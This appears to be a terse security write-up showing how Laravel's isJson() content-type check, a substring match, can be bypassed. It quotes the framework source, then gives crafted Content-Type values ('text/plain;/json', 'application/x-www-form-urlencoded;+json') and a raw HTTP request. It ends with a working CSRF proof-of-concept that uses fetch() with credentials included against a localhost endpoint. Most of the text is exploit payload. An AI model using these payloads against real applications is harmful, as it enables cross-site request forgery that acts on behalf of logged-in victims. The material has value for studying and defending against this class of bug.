Endpoint
public function test(Request $request) {
if($request->isJson()) {
$data = $request->json();Source code (/laravel/framework/src/Illuminate/Http/Concerns/InteractsWithContentTypes.php)
public function isJson()
{
return Str::contains($this->header('CONTENT_TYPE'), ['/json', '+json']);JSON Content-Type
XXX;/json
XXX;+json
HTTP Request
POST /json HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded;+json
Content-Length: 13
{"test":true}CSRF PoC
<script>
fetch('http://localhost/json',{
method:'POST',
headers:{'Content-Type':'text/plain;/json'},
body:'{"test":true}',
credentials: 'include'
});
</script>Multipart Content-Type
Same as PHP